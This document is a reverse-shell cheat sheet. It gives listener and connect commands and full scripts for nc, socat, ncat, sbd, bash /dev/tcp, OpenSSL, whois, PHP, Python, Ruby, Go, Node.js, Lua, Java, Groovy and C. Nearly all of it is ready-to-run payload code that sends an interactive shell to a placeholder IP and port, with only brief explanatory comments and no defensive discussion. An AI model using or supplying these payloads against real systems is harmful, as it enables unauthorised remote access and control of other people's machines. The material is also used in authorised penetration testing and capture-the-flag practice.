
Reverse shells cheatsheet

nc

listen:

nc -nl PORT

connect:

nc -e /bin/sh IP PORT
nc -c sh IP PORT

nc without -e and -c options

connect:

rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc IP PORT >/tmp/f

connect, one-liner:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f

socat

listen:

socat tcp-listen:PORT -

connect:

socat exec:/bin/sh tcp:IP:PORT

connect, exec command using system:

socat system:/bin/sh tcp:IP:PORT

Fork

handle each arriving connection in a child process and keep the parent process listening:

socat tcp-listen:PORT,fork -




With pseudo terminal (PTY)

listen:

socat file:`tty`,raw,echo=0 tcp-listen:PORT

connect:

socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT

SSL-encrypted (verify=0 on both sides disables certificate verification, so the traffic is encrypted but neither peer is authenticated)

Generate a self-signed certificate:

openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem

listen:

socat openssl-listen:PORT,cert=cert.pem,key=key.pem,verify=0,fork -

connect:

socat openssl:IP:PORT,verify=0 exec:/bin/bash

ncat

listen (--allow restricts which client address may connect):

ncat --allow IP -nl PORT

connect:

ncat --exec /bin/sh IP PORT

SSL-encrypted

listen:

ncat --allow IP -vnl PORT --ssl

connect:

ncat --exec /bin/sh --ssl IP PORT

UDP

listen:

ncat -ulnvp PORT

connect:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|ncat -u IP PORT >/tmp/f

sbd

sbd package

listen:

sbd -lp PORT

connect:

sbd -e /bin/sh HOST PORT

encrypted

listen:

sbd -l -c on -k ENCRYPTION_PHRASE -p PORT

connect:

sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT

bash

listen, using for example nc:

nc -nl PORT

connect:

bash -i >& /dev/tcp/IP/PORT 0>&1
bash -i 5<> /dev/tcp/IP/PORT 0<&5 1>&5 2>&5

or connect with bash -c:

bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'

UDP

listen, using for example nc:

nc -nul PORT

connect:

sh -i >& /dev/udp/IP/PORT 0>&1






OpenSSL

listen:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT

connect:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s

whois

listen (socat, here on a fixed port 8090):

socat tcp-listen:8090,fork,reuseaddr -

Usage: type the command, press Enter and then press CTRL+D.

connect:

while true; do X=`eval $(whois -h IP -p PORT "Output: $X")`; sleep 1; done





php

listen, using for example nc:

nc -nl PORT

connect (exec):

php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

connect (shell_exec):

php -r '$sock=fsockopen("IP", PORT);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

connect (system):

php -r '$sock=fsockopen("IP", PORT);system("/bin/sh -i <&3 >&3 2>&3");'

connect (passthru):

php -r '$sock=fsockopen("IP", PORT);passthru("/bin/sh -i <&3 >&3 2>&3");'

connect (popen):

php -r '$sock=fsockopen("IP", PORT);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

connect (proc_open):

php -r '$sock=fsockopen("IP", PORT);proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

connect (backticks):

php -r '$sock=fsockopen("IP", PORT);`/bin/sh -i <&3 >&3 2>&3`;'

Python

listen, using for example nc:

nc -nl PORT

connect with Python script:

#!/usr/bin/env python
# Connects a TCP socket to IP:PORT, points this process's stdin/stdout/stderr
# (fds 0, 1, 2) at that socket, then runs an interactive /bin/sh so the shell's
# I/O travels over the connection.  "IP" and PORT are placeholders to fill in;
# as written, PORT is an undefined name.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
# dup2 replaces each standard descriptor with the socket descriptor.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])  # blocks until the shell exits; p is its exit status

One-liner (python -c):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'










Ruby

listen, using for example nc:

nc -nl PORT

connect script:

#!/usr/bin/ruby
# Connects to IP:PORT and re-points $stdin/$stdout/$stderr at the socket, then
# reads the connection line by line, runs each non-empty line through IO.popen
# and writes every output line (stripped) back to the socket.  Errors raised
# while running a command are swallowed by the trailing `rescue nil`.
require 'socket';
c=TCPSocket.new('IP', PORT)
$stdin.reopen(c)
$stdout.reopen(c)
$stderr.reopen(c)
$stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }

connect, one-liner (sh):

ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("IP", PORT))'

connect, one-liner (popen):

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("IP",PORT);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Go

listen, using for example nc:

nc -nl PORT

create a rev.go file:

package main;
import"os/exec";
import"net";
// Dials IP:PORT over TCP and runs /bin/sh with its stdin, stdout and stderr bound
// to the connection.  The error from net.Dial is discarded (c,_), so a failed
// connect is not reported; cmd.Run blocks until the shell exits.
func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}

build and run:

go run rev.go

connect, one-liner:

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

nodejs

listen, using for example nc:

nc -nl PORT

create a rev.js script file:

// Starts /bin/bash via child_process.exec(), connects a TCP socket to IP:PORT and
// pipes the socket into the shell's stdin and the shell's stdout/stderr back into
// the socket.  Socket errors are not handled (no "error" listener is attached).
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(PORT, "IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

one-liner:

require("child_process").exec('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')

connect running the script:

nodejs rev.js




one-liners from the CLI:

connect, exec:

node -e 'require("child_process").exec(`bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"`)'

connect, single quotes:

node -e '(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(PORT, "IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'

connect, double quotes:

node -e "(function(){ var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(IP, 'PORT', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();"

connect, backticks:

node -e '(function(){ var net = require(`net`), cp = require(`child_process`), sh = cp.spawn(`/bin/sh`, []); var client = new net.Socket(); client.connect(IP, `PORT`, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'

connect, HEREDOC:

node - <<EOF
(function(){ var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(PORT, 'IP', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
EOF

Lua

listen, using for example nc:

nc -nl PORT

connect (os.execute):

lua -e "local socket = require('socket');require('os');t=socket.tcp();t:connect('IP','PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"

connect (popen):

lua -e 'local host, port = "IP", PORT local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'






Java

listen, using for example nc:

nc -nl PORT





create a Rev.java file:

Linux

Runtime exec:

public class Rev {
    /**
     * Runs one shell command through Runtime.exec().  Runtime.exec() splits its
     * string on whitespace and does not interpret shell redirections, so the
     * "$@|bash 0 echo ..." wrapper hands the redirection text to a second bash,
     * which opens /dev/tcp/IP/PORT and attaches an interactive shell to it.
     * "IP" and "PORT" are placeholders to fill in.
     */
    public static void main(String[] args) {
        Process p;
        try {
            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/IP/PORT 0>&1");
            p.waitFor();   // block until the child exits
            p.destroy();
        } catch (Exception e) {}   // every failure (IOException, InterruptedException) is silently discarded
    }
}

ProcessBuilder:

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
  /**
   * Starts cmd as a child process, opens a TCP socket to host:port and relays
   * bytes between the two in a polling loop: child stdout/stderr to the socket,
   * socket to child stdin, one byte per available() check, sleeping 50 ms per
   * round, until the socket is closed or the child has exited.
   * "IP" and PORT are placeholders; PORT must be replaced with an int literal.
   */
  public static void main(String[] args) {
    String host="IP";
    int port=PORT;
    String cmd="/bin/sh";
    try {
      // redirectErrorStream(true) merges the child's stderr into stdout, so pe normally carries no data.
      // p.exitValue() throws while the child is still running; the inner try/catch uses that as the "still alive" test.
      Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    } catch (Exception e) {}   // connect failures, I/O errors and interrupts are all silently ignored
  }
}

Windows

ProcessBuilder:

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
  /**
   * Windows variant of the ProcessBuilder relay: starts cmd.exe as a child
   * process, opens a TCP socket to host:port and copies bytes between the two
   * in a 50 ms polling loop until the socket closes or the child exits.
   * "IP" and PORT are placeholders; PORT must be replaced with an int literal.
   */
  public static void main(String[] args) {

    String host="IP";
    int port=PORT;
    String cmd="cmd.exe";
    try {
      // Same relay loop as the Linux version; p.exitValue() throwing is used as the "child still running" signal.
      Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    } catch (Exception e) {}   // all exceptions are silently discarded
  }
}

Compile and connect

compile:

javac Rev.java

connect:

java Rev








Groovy

listen, using for example nc:

nc -nl PORT







create a rev.groovy file:

Linux

// Groovy script form of the Java ProcessBuilder relay: starts /bin/bash, connects
// to host:port and shuttles bytes between the socket and the child's stdin/stdout
// in a 50 ms polling loop until the socket closes or the child exits.
// java.net and java.io are imported by default in Groovy, hence no import lines.
String host="IP";
int port=PORT;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Windows

// Windows variant of the Groovy relay script: identical to the Linux one except
// that the child process is cmd.exe.  Unlike the Java versions there is no
// surrounding try/catch, so a connect failure terminates the script with an exception.
String host="IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

connect:

groovy rev.groovy








C

create a rev.c file:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
    /* Opens a TCP connection to IP:PORT, points fds 0/1/2 at the socket and
     * replaces this process image with /bin/sh, so the shell's I/O runs over
     * the connection.  "IP" and PORT are placeholders to fill in. */
    int sockfd;
    int lport = PORT;
    struct sockaddr_in serv_addr;
    char *const params[] = {"/bin/sh", NULL};
    char *const environ[] = {NULL};   /* empty environment for the exec'd shell; note the name shadows libc's environ */

    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);   /* return value is never checked */
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr("IP");
    serv_addr.sin_port = htons(lport);
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);   /* 16 stands in for sizeof(serv_addr); result is never checked */

    /* Stack the redirections: stdin <- socket, then stdout and stderr <- stdin. */
    dup2(sockfd, 0);
    dup2(0, 1);
    dup2(0, 2);
    execve("/bin/sh", params, environ);   /* only returns on failure, and that failure is not reported */
}

Compile and connect

compile:

gcc rev.c -o rev

connect:

./rev








References